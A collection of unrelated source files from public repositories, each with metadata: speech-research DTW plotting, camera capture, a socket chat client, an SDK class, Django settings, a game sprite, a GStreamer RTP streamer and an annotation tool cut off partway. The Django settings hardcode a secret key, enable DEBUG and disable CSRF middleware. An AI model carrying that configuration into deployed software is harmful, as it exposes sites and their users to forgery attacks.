79ed0714d0c43d90dfdd81ec91c54c3b87f9b879 | dbf65af61e62e9617d2bbc35fba625e005aed863 | /ir-wuggy/dtw/plot/plot-dtw-profile.py | a99b386410fe9fae83ad6fbbda046e4a8bda24f5 | [] | no_license | chorowski-lab/zs2021 | bef261073d8a26bee62576ccf107e163ecf9fe89 | bbcb97903aeeed861376a336a8af8f74a0d03ded | refs/heads/main | 2023-06-19T01:01:51.904899 | 2021-04-08T19:52:34 | 2021-04-08T19:52:34 | 345,989,211 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,993 | py | # %%
import numpy as np
import os
import pathlib
import argparse
import pickle
import yaml
import pandas
import matplotlib.pyplot as plt
# %%
parser = argparse.ArgumentParser(description='Compute the pseudo log-proba of a list of sentences')
parser.add_argument('config', type=str, help='Location of the .yaml config file')
parser.add_argument('--gold', type=pathlib.Path, default=pathlib.Path('/pio/data/zerospeech2021/dataset/lexical/dev/gold.csv'),
help='Location of the gold.csv file')
args = parser.parse_args()
# %%
class Args:
config = pathlib.Path('/pio/scratch/1/i290956/zs2021/lexical/configurations/train-960/train-960-dtw-dm-ext.yaml')
gold = pathlib.Path('/pio/data/zerospeech2021/dataset/lexical/dev/gold.csv')
q = 500
args = Args()
# %%
with open(args.config) as config_file:
config = yaml.full_load(config_file)
class Dataset:
def __init__(self, path):
self.data = []
self.filenames = []
self.filename_to_id = dict()
self.n = 0
for line in open(path, 'r', encoding='utf8'):
fname, sdesc = line.strip().split()
self.filenames.append(fname)
self.filename_to_id[fname] = self.n
d = list(map(int, sdesc.split(',')))
self.data.append(np.array(d, dtype='int32'))
self.n += 1
self.filenames = np.array(self.filenames)
self.maxlength = max(len(sample) for sample in self.data)
def __getitem__(self, i):
return self.filenames[i], self.data[i]
def __len__(self):
return self.n
def get(self, fname):
return self.data[self.filename_to_id[fname]]
class Results:
def __init__(self, path):
self.filename_to_id = dict()
self.n = 0
self.filenames = []
self.costs = []
ids = [int(fname.split('-')[1]) for fname in os.listdir(path) if fname.startswith('dev-')]
n = max(ids)
if len(set(range(1, n+1)) - set(ids)) > 0:
raise ValueError(f'some dev-i files are missing')
for i in range(1, n+1):
for line in open(path / f'dev-{i}', 'r'):
fname, costs, Fnames = line.strip().split()
costs = list(map(float, costs[1:-1].split(',')))
Fnames = list(map(lambda x: x[1:-1], Fnames[1:-1].split(',')))
self.costs.append(costs)
self.filenames.append(Fnames)
self.filename_to_id[fname] = self.n
self.n += 1
def get(self, fname):
return self.costs[self.filename_to_id[fname]], self.filenames[self.filename_to_id[fname]]
def dtw_ext(s, t, d):
n, m = len(t), len(s)
DTW = np.ones((2, m)) * 100000
costpath = np.zeros((2, m, n))
started = np.vstack((np.arange(m), np.zeros(m, dtype='int32')))
DTW[0, :] = 0
q = 1
for i in range(n):
cost = s[0] != t[i] if d is None else d[s[0], t[i]]
DTW[q, 0] = DTW[1-q,0] + cost
if i > 0:
costpath[q, 0, :i] = costpath[1-q,0,:i]
costpath[q, 0, i] = cost
started[1-q,0] = started[q,0]
for j in range(1, m):
cost = s[j] != t[i] if d is None else d[s[j], t[i]]
costpath[q, j, i] = cost
if DTW[1-q,j-1] <= DTW[1-q, j] and DTW[1-q,j-1] <= DTW[q, j-1]:
DTW[q,j] = cost + DTW[1-q,j-1]
costpath[q, j, :i] = costpath[1-q,j-1,:i]
started[q,j] = started[1-q,j-1]
elif DTW[1-q,j] <= DTW[1-q, j-1] and DTW[1-q,j] <= DTW[q,j-1]:
DTW[q,j] = cost + DTW[1-q,j]
costpath[q, j, :i] = costpath[1-q,j,:i]
started[q,j] = started[1-q,j]
else:
DTW[q,j] = cost + DTW[q,j-1]
costpath[q, j, :i] = costpath[q,j-1,:i]
started[q,j] = started[q,j-1]
q = 1 - q
bi = np.argmin(DTW[1-q,:])
return DTW[1-q,bi], costpath[1-q,bi,:], started[1-q,bi], bi
def load_entropy():
return pickle.load(open('/pio/scratch/2/mstyp/wav2vec/experiments/zerospeech_lm/lstm_3l_qt/entropy/12/entropy', 'rb'))
# %%
trainPath = pathlib.Path(config["trainFile"]) if "trainFile" in config else pathlib.Path(config["trainPath"]) / 'quantized_outputs.txt'
testPath = pathlib.Path(config["testFile"]) if "testFile" in config else pathlib.Path(config["testPath"]) / 'quantized_outputs.txt'
outPath = pathlib.Path(config['outPath']).parents[0]
trainset = Dataset(trainPath)
testset = Dataset(testPath)
results = Results(outPath)
gold = pandas.read_csv(args.gold, header=0).astype({'frequency': pandas.Int64Dtype()})
distMatrix = np.load(config['method']['distMatrix'], allow_pickle=True)
entropy = load_entropy()
# %%
distMatrix = np.load('/pio/scratch/1/i290956/zs2021/lexical/dm/distMatrix1.npy')
def gen_profile(fname, offset):
testsample = testset.get(fname)
costs, Fnames = results.get(fname)
trainsample = trainset.get(Fnames[0])
c, p, a, b = dtw_ext(trainsample, testsample, distMatrix)
ent = entropy[Fnames[0]]
# return ent[a-offset:b+1+offset], offset - max(offset-a, 0), b+1-a
return p
w_colors = ['#00600f', '#6abf69', '#005b9f', '#5eb8ff']
nw_colors = ['#9a0007', '#ff6659', '#bb4d00', '#ffad42']
def generate_plots(id):
samples = gold[gold['id'] == id]
words = samples[samples['correct'] == 1]['filename'].to_numpy()
nonwords = samples[samples['correct'] == 0]['filename'].to_numpy()
offset = 50
words_profiles = [gen_profile(fname, offset) for fname in words]
nonwords_profiles = [gen_profile(fname, offset) for fname in nonwords]
plt.figure(figsize=(16,9))
plt.plot(np.arange(len(words_profiles[0])), words_profiles[0], color=w_colors[0])
plt.plot(np.arange(len(nonwords_profiles[0])), nonwords_profiles[0], color=nw_colors[0])
# plt.axvspan(off, off+lgh, facecolor='0.2', alpha=0.3)
plt.xlabel('Time')
plt.ylabel('Cost')
plt.plot()
# plt.close()
generate_plots(5)
# %%
| [
"[email protected]"
] | |
1b1ab3e24221ed687e2f7b52f6c610a97ea72193 | 2a4aced6789a09b64caead20fd231ed104f4583b | /capture/ximea-usb3/python/openCV/example_openCV_video.py | d5ce3a8d0bd1f3d22183a1ff0102b73f72fcc20d | [
"MIT"
] | permissive | ruedijc/jetson-cam-utils | 8dd2a8fa48b390b940b938c9a0519df5599ef63d | 29fb26892cc150f9679ad7d5c3220e38f733ab04 | refs/heads/main | 2023-04-27T12:22:09.079527 | 2021-05-06T16:54:33 | 2021-05-06T16:54:33 | 329,092,484 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,300 | py | from ximea import xiapi
import cv2
import time
#create instance for first connected camera
cam = xiapi.Camera()
#start communication
print('Opening first camera...')
cam.open_device()
#settings
cam.set_exposure(20000)
#create instance of Image to store image data and metadata
img = xiapi.Image()
#start data acquisition
print('Starting data acquisition...')
cam.start_acquisition()
try:
print('Starting video. Press CTRL+C to exit.')
t0 = time.time()
while True:
#get data and pass them from camera to img
cam.get_image(img)
#create numpy array with data from camera. Dimensions of the array are
#determined by imgdataformat
data = img.get_image_data_numpy()
#show acquired image with time since the beginning of acquisition
font = cv2.FONT_HERSHEY_SIMPLEX
text = '{:5.2f}'.format(time.time()-t0)
cv2.putText(
data, text, (900,150), font, 4, (255, 255, 255), 2
)
cv2.imshow('XiCAM example', data)
cv2.waitKey(1)
except KeyboardInterrupt:
cv2.destroyAllWindows()
#stop data acquisition
print('Stopping acquisition...')
cam.stop_acquisition()
#stop communication
cam.close_device()
print('Done.')
| [
"[email protected]"
] | |
a955aa2adcf7d72b65e3af9165bf022c5a057ec0 | 9d29b302cca89a4ad816f99f1d3c708862dd4c0b | /client.py | 73c58c8f77fdac730b4bde122ffd76801a4ac751 | [] | no_license | Manoj-M-97/Flight-Booking-System | a28c57c770ea06cc4c8704dbddc2740ec3d86fcd | 649d74c63d73a24a3fd97406008903f806ffa34b | refs/heads/master | 2020-03-22T04:02:38.788029 | 2018-07-02T16:48:21 | 2018-07-02T16:48:21 | 139,468,945 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,361 | py | # Python program to implement client side of chat room.
import socket
import select
import sys
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if len(sys.argv) != 3:
print "Correct usage: script, IP address, port number"
exit()
IP_address = str(sys.argv[1])
Port = int(sys.argv[2])
server.connect((IP_address, Port))
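# Example invocation (address/port illustrative): python client.py 127.0.0.1 8081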
cl="CLOSE"
while True:
# maintains a list of possible input streams
sockets_list = [sys.stdin, server]
""" There are two possible input situations. Either the
user wants to give manual input to send to other people,
or the server is sending a message to be printed on the
screen. Select returns from sockets_list, the stream that
    is ready for input. So for example, if the server wants
to send a message, then the if condition will hold true
below.If the user wants to send a message, the else
condition will evaluate as true"""
read_sockets,write_socket, error_socket = select.select(sockets_list,[],[])
for socks in read_sockets:
if socks == server:
message = socks.recv(2048)
if (message.endswith(cl)):
print "Connection Terminated"
exit()
print message
else:
message = sys.stdin.readline()
server.send(message)
sys.stdout.flush()
server.close()
| [
"[email protected]"
] | |
c3b2ccf3279e3d6c131b50d1a8a089fc8ee00b32 | 5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d | /alipay/aop/api/domain/BizListDataInfo.py | 5f874dfae528b4b6592ad1306c025ec59eb0239e | [
"Apache-2.0"
] | permissive | alipay/alipay-sdk-python-all | 8bd20882852ffeb70a6e929038bf88ff1d1eff1c | 1fad300587c9e7e099747305ba9077d4cd7afde9 | refs/heads/master | 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 | Apache-2.0 | 2023-04-25T04:54:02 | 2018-05-14T09:40:54 | Python | UTF-8 | Python | false | false | 1,206 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class BizListDataInfo(object):
def __init__(self):
self._code = None
self._name = None
@property
def code(self):
return self._code
@code.setter
def code(self, value):
self._code = value
@property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
def to_alipay_dict(self):
params = dict()
if self.code:
if hasattr(self.code, 'to_alipay_dict'):
params['code'] = self.code.to_alipay_dict()
else:
params['code'] = self.code
if self.name:
if hasattr(self.name, 'to_alipay_dict'):
params['name'] = self.name.to_alipay_dict()
else:
params['name'] = self.name
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = BizListDataInfo()
if 'code' in d:
o.code = d['code']
if 'name' in d:
o.name = d['name']
return o
| [
"[email protected]"
] | |
127f14137ff8c69323cb99a5ec67d900927cca5e | 4b17225bc3860419edb6a8818bbac82e6b36e79d | /employee_tracker/settings.py | ce1b5d600785fc29625c723fdb419d1d986f35e8 | [] | no_license | argon2008-aiti/employee_tracker | 8ab45ee727e07b242d6ac3fb446ca5c1b9649bb0 | 5be7c3bb323f3b350d26df4d4813b6b071324277 | refs/heads/master | 2021-01-15T13:00:03.644233 | 2016-10-06T16:42:28 | 2016-10-06T16:42:28 | 35,000,045 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,444 | py | """
Django settings for employee_tracker project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'cdkxms9u50qs@ig3j3s771u55ntlvxp2h8pijlx2rr83ms)#7q'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = [".herokuapp.com"]
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'south',
'monitor',
'leaflet',
'djgeojson',
'django_ajax',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
#'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'employee_tracker.urls'
WSGI_APPLICATION = 'employee_tracker.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# for graphviz
GRAPH_MODELS = {
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
# static file directories
STATICFILES_DIRS = (
('assets', 'static'),
)
# base url at which static files are served
STATIC_URL = '/assets/'
STATIC_ROOT = os.path.join(BASE_DIR,'assets')
LOGIN_URL = '/login'
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'django.template.loaders.eggs.Loader',
)
# Template files (html+django templates)
TEMPLATE_DIRS = (
os.path.join(BASE_DIR, "templates"),
)
# Production code
if DEBUG==False:
#parse database configuration from $DATABASE_URL
import dj_database_url
DATABASES['default'] = dj_database_url.config()
# Honor the 'X-Forwarded-Proto' header for request.is_secure()
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# Allow all host headers
ALLOWED_HOSTS = ['*']
# Static asset configuration
import os
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
STATIC_ROOT = 'staticfiles'
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
| [
"[email protected]"
] | |
9b104ec52e6584f2efd846c1fb6016f0c5fbebfd | f3a714a064b12ce957f496c97200d5b0c31f631e | /remove_current.py | de3697d60276efd9f98f89abb276c2b081da2181 | [] | no_license | krachbumm3nte/playlistAdder | af06d6d0de731f42cb68cf5acf7d29a809d13578 | 7caac884101b59354a0aa2928b9f8089a3c0cdb9 | refs/heads/master | 2020-05-04T01:32:07.552438 | 2019-11-30T18:09:52 | 2019-11-30T18:09:52 | 178,907,025 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 802 | py | from functools import partial
import config
from adder_utils import *
def removetool(master, list_id, list_name, song_id, spotipy_instance):
removefunc = partial(remove_song_from, song_id, list_id, spotipy_instance, list_name)
query, query_label = continue_query(querytext=f"remove this song from {list_name}?", master=master,
cancel_func=sys.exit, continue_func=removefunc)
query.pack()
query.focus_set()
def remove_song_from(song_id, list_id, spotipy_instance, list_name, event=None):
spotipy_instance.user_playlist_remove_all_occurrences_of_tracks(user=config.user,
playlist_id=list_id, tracks=[song_id])
print(f'removed song from {list_name}')
sys.exit()
| [
"johannes.gmx.de"
] | johannes.gmx.de |
98616241fbdcb931bae105f55cdfe34251a2d974 | 26408f11b938a00f8b97a3e195095a45a12dc2c7 | /sneeze/Player.py | e1aecbdfcc7127f7257b5d20b68035b164acb822 | [] | no_license | cz-fish/sneeze-dodger | a7ea25e9267d408e8f46a9fb7a988d52dca8bd8e | 4fd333345d1f7d82c92ddcb15f18077362766844 | refs/heads/master | 2022-07-07T01:39:06.162125 | 2020-05-18T08:01:57 | 2020-05-18T08:01:57 | 255,090,774 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 849 | py | from sneeze.Actor import Actor
from sneeze.Sprite import Sprite
from sneeze.Types import *
class Player(Actor):
def __init__(self):
super().__init__()
self.sprite = Sprite.load('guy')
def move(self, inputs: Inputs, collision) -> None:
self.update_speed(inputs.xvalue, inputs.yvalue)
new_pos = collision(self.pos, self.speed_vec)
if new_pos == self.pos:
self.speed_vec = Pos(0, 0)
self.move_to(new_pos)
# walk phase; reset if not moving
if abs(self.speed_vec.x) < 2 and abs(self.speed_vec.y) < 2:
self.animation = Animation('idle', 0)
else:
key, phase = self.animation
if key == 'walk':
self.animation = Animation(key, phase + 1)
else:
self.animation = Animation('walk', 0)
| [
"[email protected]"
] | |
0de2dcdd25e4cabb3723ac7cb45dbf917637dc3b | 909b93b8df2a79a2ba7567587604d764a34281fc | /bot/app_streamer.py | 9f885eb613ee7ad8498df4d050264a4778119448 | [] | no_license | ArtemZaZ/PultBot | f321282534c02789ac5b868844da15fe4614b9ac | d23b867eb7eda78b006fa32f503148da2a4d6d7f | refs/heads/master | 2020-03-07T05:52:29.748385 | 2019-12-06T12:23:14 | 2019-12-06T12:23:14 | 127,307,917 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 13,613 | py | import gi
gi.require_version('Gst', '1.0')
from gi.repository import Gst
import sys
import threading
import logging
import numpy as np
from bot.common import *
HOST = '127.0.0.1'
RTP_PORT = 5000
class AppSrcStreamer(object):
def __init__(self, video=VIDEO_MJPEG, resolution=(640, 480), framerate=30,
onFrameCallback=None, useOMX=False, scale=1):
self._host = HOST
self._port = RTP_PORT
self._width = resolution[0]
self._height = resolution[1]
self._scaleWidth = int(self._width * scale)
self._scaleHeight = int(self._height * scale)
        self._needFrame = threading.Event()  # flag: an OpenCV frame needs to be produced
self.playing = False
self.paused = False
self._onFrameCallback = None
if video != VIDEO_RAW:
if (not onFrameCallback is None) and callable(onFrameCallback):
                self._onFrameCallback = onFrameCallback  # handler for the "OpenCV frame ready" event
        # initialize GStreamer
        Gst.init(None)
        # create the pipeline
self._make_pipeline(video, self._width, self._height, framerate, useOMX, scale)
self.bus = self.pipeline.get_bus()
self.bus.add_signal_watch()
self.bus.connect('message', self._onMessage)
self.ready_pipeline()
def _make_pipeline(self, video, width, height, framerate, useOMX, scale):
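        # Pipeline sketch (two-branch case; RAW input additionally goes through
        # videoconvert -> jpegenc before the parser):
        #   appsrc -> parser -> tee
        #   tee -> rtp_queue   -> payloader -> rtpbin -> udpsink (RTP/RTCP out)
        #   tee -> frame_queue -> decoder [-> videoscale] -> videoconvert -> appsink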
        # Build the GStreamer pipeline
self.pipeline = Gst.Pipeline()
self.rtpbin = Gst.ElementFactory.make('rtpbin')
self.rtpbin.set_property('latency', 200)
        self.rtpbin.set_property('drop-on-latency', True)  # drop frames that arrive too late
self.rtpbin.set_property('buffer-mode', 4)
        self.rtpbin.set_property('ntp-time-source', 3)  # time source: clock-time
self.rtpbin.set_property('ntp-sync', True)
self.rtpbin.set_property('rtcp-sync-send-time', False)
        # configure appsrc
self.appsrc = Gst.ElementFactory.make('appsrc')
self.appsrc.set_property('is-live', True)
if video == VIDEO_H264:
videoStr = 'video/x-h264'
elif video == VIDEO_MJPEG:
videoStr = 'image/jpeg'
elif video == VIDEO_RAW:
videoStr = 'video/x-raw,format=RGB'
capstring = videoStr + ',width=' + str(width) \
+ ',height=' + str(height) + ',framerate=' \
+ str(framerate) + '/1'
srccaps = Gst.Caps.from_string(capstring)
self.appsrc.set_property('caps', srccaps)
# print('RPi camera GST caps: %s' % capstring)
if video == VIDEO_RAW:
self.videoconvertRAW = Gst.ElementFactory.make('videoconvert')
self.videoconvertRAWFilter = Gst.ElementFactory.make('capsfilter', 'videoconvertfilter')
videoconvertCaps = Gst.caps_from_string(
                'video/x-raw,format=I420')  # data format for the JPEG conversion
self.videoconvertRAWFilter.set_property('caps', videoconvertCaps)
self.jpegenc = Gst.ElementFactory.make('jpegenc')
# self.jpegenc = Gst.ElementFactory.make('vaapijpegenc')
# self.jpegenc = Gst.ElementFactory.make('avenc_ljpeg')
# jpegencCaps = Gst.Caps.from_string('video/x-raw,format=I420')
# self.jpegenc.set_property('caps', jpegencCaps)
if video == VIDEO_H264:
parserName = 'h264parse'
else:
parserName = 'jpegparse'
self.parser = Gst.ElementFactory.make(parserName)
if video == VIDEO_H264:
payloaderName = 'rtph264pay'
# rtph264pay.set_property('config-interval', 10)
# payloadType = 96
else:
payloaderName = 'rtpjpegpay'
# payloadType = 26
self.payloader = Gst.ElementFactory.make(payloaderName)
# payloader.set_property('pt', payloadType)
# For RTP Video
self.udpsink_rtpout = Gst.ElementFactory.make('udpsink', 'udpsink_rtpout')
# self.udpsink_rtpout.set_property('host', self._host)
# self.udpsink_rtpout.set_property('port', self._port)
self.udpsink_rtpout.set_property('sync', False)
self.udpsink_rtpout.set_property('async', False)
self.udpsink_rtcpout = Gst.ElementFactory.make('udpsink', 'udpsink_rtcpout')
# self.udpsink_rtcpout.set_property('host', self._host)
# self.udpsink_rtcpout.set_property('port', self._port + 1)
self.udpsink_rtcpout.set_property('sync', False)
self.udpsink_rtcpout.set_property('async', False)
self.udpsrc_rtcpin = Gst.ElementFactory.make('udpsrc', 'udpsrc_rtcpin')
srcCaps = Gst.Caps.from_string('application/x-rtcp')
# self.udpsrc_rtcpin.set_property('port', self._port + 5)
self.udpsrc_rtcpin.set_property('caps', srcCaps)
        # set the destination IP address and ports
self.setHost(self._host)
self.setPort(self._port)
if not self._onFrameCallback is None:
self.tee = Gst.ElementFactory.make('tee')
self.rtpQueue = Gst.ElementFactory.make('queue', 'rtp_queue')
self.frameQueue = Gst.ElementFactory.make('queue', 'frame_queue')
if video == VIDEO_H264:
if useOMX:
decoderName = 'omxh264dec' # works well, ~200% CPU load
else:
decoderName = 'avdec_h264' # works poorly, ~120% CPU load
# decoder = Gst.ElementFactory.make('avdec_h264_mmal') # did not work
else:
if useOMX:
decoderName = 'omxmjpegdec' #
else:
decoderName = 'avdec_mjpeg' #
# decoder = Gst.ElementFactory.make('jpegdec') #
self.decoder = Gst.ElementFactory.make(decoderName)
self.videoconvert = Gst.ElementFactory.make('videoconvert')
if scale != 1:
self.videoscale = Gst.ElementFactory.make('videoscale')
self.videoscaleFilter = Gst.ElementFactory.make('capsfilter', 'scalefilter')
videoscaleCaps = Gst.caps_from_string('video/x-raw, width=%d, height=%d' % (
self._scaleWidth, self._scaleHeight)) # data format after rescaling
self.videoscaleFilter.set_property('caps', videoscaleCaps)
### create our own sink to hand frames from GStreamer over to OpenCV
self.appsink = Gst.ElementFactory.make('appsink')
cvCaps = Gst.caps_from_string('video/x-raw, format=RGB') # format of the received data
self.appsink.set_property('caps', cvCaps)
self.appsink.set_property('sync', False)
# appsink.set_property('async', False)
self.appsink.set_property('drop', True)
self.appsink.set_property('max-buffers', 5)
self.appsink.set_property('emit-signals', True)
self.appsink.connect('new-sample', self._newSample)
# add all elements to the pipeline
elemList = [self.appsrc, self.rtpbin, self.parser, self.payloader, self.udpsink_rtpout,
self.udpsink_rtcpout, self.udpsrc_rtcpin]
if video == VIDEO_RAW:
elemList.extend([self.videoconvertRAW, self.videoconvertRAWFilter, self.jpegenc])
if not self._onFrameCallback is None:
elemList.extend([self.tee, self.rtpQueue, self.frameQueue, self.decoder, self.videoconvert, self.appsink])
if scale != 1:
elemList.extend([self.videoscale, self.videoscaleFilter])
for elem in elemList:
if elem is None:
logging.critical('GST element could not be created (got None)')
sys.exit(1)
self.pipeline.add(elem)
# link the elements
if video == VIDEO_RAW:
ret = self.appsrc.link(self.videoconvertRAW)
ret = ret and self.videoconvertRAW.link(self.videoconvertRAWFilter)
ret = ret and self.videoconvertRAWFilter.link(self.jpegenc)
ret = ret and self.jpegenc.link(self.parser)
else:
ret = self.appsrc.link(self.parser)
# link the rtpbin elements
ret = ret and self.payloader.link_pads('src', self.rtpbin, 'send_rtp_sink_0')
ret = ret and self.rtpbin.link_pads('send_rtp_src_0', self.udpsink_rtpout, 'sink')
ret = ret and self.rtpbin.link_pads('send_rtcp_src_0', self.udpsink_rtcpout, 'sink')
ret = ret and self.udpsrc_rtcpin.link_pads('src', self.rtpbin, 'recv_rtcp_sink_0')
if self._onFrameCallback is None: # streaming without onFrameCallback, i.e. build a single branch
ret = ret and self.parser.link(self.payloader)
else: # streaming with frames passed to onFrameCallback, so build two branches
ret = ret and self.parser.link(self.tee)
# branch 1: RTP
ret = ret and self.rtpQueue.link(self.payloader)
# branch 2: onFrame
ret = ret and self.frameQueue.link(self.decoder)
if scale != 1:
ret = ret and self.decoder.link(self.videoscale)
ret = ret and self.videoscale.link(self.videoscaleFilter)
ret = ret and self.videoscaleFilter.link(self.videoconvert)
else:
ret = ret and self.decoder.link(self.videoconvert)
ret = ret and self.videoconvert.link(self.appsink)
# connect tee to rtpQueue
teeSrcPadTemplate = self.tee.get_pad_template('src_%u')
rtpTeePad = self.tee.request_pad(teeSrcPadTemplate, None, None)
rtpQueuePad = self.rtpQueue.get_static_pad('sink')
ret = ret and (rtpTeePad.link(rtpQueuePad) == Gst.PadLinkReturn.OK)
# connect tee to frameQueue
frameTeePad = self.tee.request_pad(teeSrcPadTemplate, None, None)
frameQueuePad = self.frameQueue.get_static_pad('sink')
ret = ret and (frameTeePad.link(frameQueuePad) == Gst.PadLinkReturn.OK)
if not ret:
logging.critical('GST elements could not be linked')
sys.exit(1)
def setHost(self, host):
self._host = host
self.udpsink_rtpout.set_property('host', host)
self.udpsink_rtcpout.set_property('host', host)
def setPort(self, port):
self._port = port
self.udpsink_rtpout.set_property('port', port)
self.udpsink_rtcpout.set_property('port', port + 1)
self.udpsrc_rtcpin.set_property('port', port + 5)
def _newSample(self, sink): # callback invoked for every incoming frame
if self._needFrame.is_set(): # if the "frame wanted" flag is set
self._needFrame.clear() # clear the flag
sample = sink.emit('pull-sample')
sampleBuff = sample.get_buffer()
data = np.ndarray(
(self._scaleHeight, self._scaleWidth, 3),
buffer=sampleBuff.extract_dup(0, sampleBuff.get_size()), dtype=np.uint8)
# invoke the handler, passing the pixel array and the frame width/height
# color format is RGB
self._onFrameCallback(data, self._scaleWidth, self._scaleHeight)
del sample
return Gst.FlowReturn.OK
def _onMessage(self, bus, message):
# print('Message: %s' % str(message.type))
t = message.type
if t == Gst.MessageType.EOS:
logging.info('Received EOS-Signal')
self.stop_pipeline()
elif t == Gst.MessageType.ERROR:
error, debug = message.parse_error()
logging.error('Received Error-Signal #%u: %s', error.code, debug)
self.null_pipeline()
# else:
# print('Message: %s' % str(t))
def play_pipeline(self):
self.pipeline.set_state(Gst.State.PLAYING)
logging.info('GST pipeline PLAYING')
logging.info('Streaming RTP on %s:%d', self._host, self._port)
def stop_pipeline(self):
self.pause_pipeline()
self.ready_pipeline()
def ready_pipeline(self):
self.pipeline.set_state(Gst.State.READY)
logging.info('GST pipeline READY')
def pause_pipeline(self):
self.pipeline.set_state(Gst.State.PAUSED)
logging.info('GST pipeline PAUSED')
def null_pipeline(self):
self.pipeline.set_state(Gst.State.NULL)
logging.info('GST pipeline NULL')
def write(self, s):
gstBuff = Gst.Buffer.new_wrapped(s)
if not (gstBuff is None):
self.appsrc.emit('push-buffer', gstBuff)
def flush(self):
self.stop_pipeline()
def frameRequest(self): # set the frame-request flag; returns True if the request was accepted
if not self._needFrame.is_set():
self._needFrame.set()
return True
return False
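# --- Illustrative usage sketch (this record is excerpted mid-class, so the
# class name "RtpStreamer" and the constructor arguments below are hypothetical
# placeholders, not the original API) ---
#
#   streamer = RtpStreamer(host='192.168.1.10', port=5000,
#                          onFrameCallback=my_frame_handler)
#   streamer.play_pipeline()        # start RTP/RTCP streaming
#   streamer.write(encoded_bytes)   # push one encoded buffer into appsrc
#   if streamer.frameRequest():     # request one decoded frame;
#       pass                        # onFrameCallback(data, w, h) fires on arrival
#   streamer.flush()                # stop: pipeline goes back to READY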
| [
"[email protected]"
] | |
92c2d34affd7b5ef8b641035988995b7157e86b1 | ecb9a783694300b2ea5f77388b2d314995680808 | /src/iter.py | 3c97589dee843e70e392c3c7af4c7b23240a0335 | [] | no_license | yaoyuanyy/python_demo | 0ee5520027d2c406e320f25a0327b7a81155bab8 | 5a50fe900e1a254a17bbb623cb2fd9f8fbdb7079 | refs/heads/master | 2021-01-17T16:08:30.412766 | 2017-02-24T06:39:59 | 2017-02-24T06:39:59 | 83,010,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 146 | py | import sys
list = [1, 2, 3]
it = iter(list)
print(it)
while True:
try:
print(next(it))
except StopIteration:
sys.exit()
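# Note: "list" above shadows the built-in list() constructor; a name such as
# "items" would be safer. The idiomatic equivalent of the manual loop is:
#
#   for item in [1, 2, 3]:
#       print(item)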
| [
"[email protected]"
] | |
0df491aaf04bd5efd3e1d19660af119f72bb10a1 | 93a959b0458bcdb60d33a4504f483078a78a56b6 | /CwnGraph/cwn_annotator.py | 7b58fe2e65d190fd9571cc70e6a5695b91cfcc2f | [] | no_license | kylecomtw/CwnGraph | a82d763a645c3342502274e6760cb63593f23d42 | 86ddb17de548a61c57f925fb2d783467431db18b | refs/heads/master | 2021-10-24T10:00:19.913420 | 2019-03-25T04:45:36 | 2019-03-25T04:45:36 | 84,843,165 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 5,050 | py | import os
import json
from datetime import datetime
from . import cwnio
from . import annot_merger
from .cwn_types import *
from .cwn_graph_utils import CwnGraphUtils
class CwnAnnotator:
PREFIX = "annot/cwn_annot"
def __init__(self, cgu, session_name):
self.parent_cgu = cgu
self.name = session_name
self.V = {}
self.E = {}
self.meta = {
"session_name": session_name,
"timestamp": "",
"serial": 0,
"base_hash": cgu.get_hash()
}
self.load(session_name)
def load(self, name):
fpath = f"{CwnAnnotator.PREFIX}_{name}.json"
if os.path.exists(fpath):
print("loading saved session from ", fpath)
self.meta, self.V, self.E = \
cwnio.load_annot_json(fpath)
base_hash = self.meta.get("base_hash", "")
if base_hash and base_hash != self.parent_cgu.get_hash():
print("WARNING: loading with a different base image")
return True
else:
print("Creating new session", name)
return False
def save(self, with_timestamp=False):
name = self.meta["session_name"]
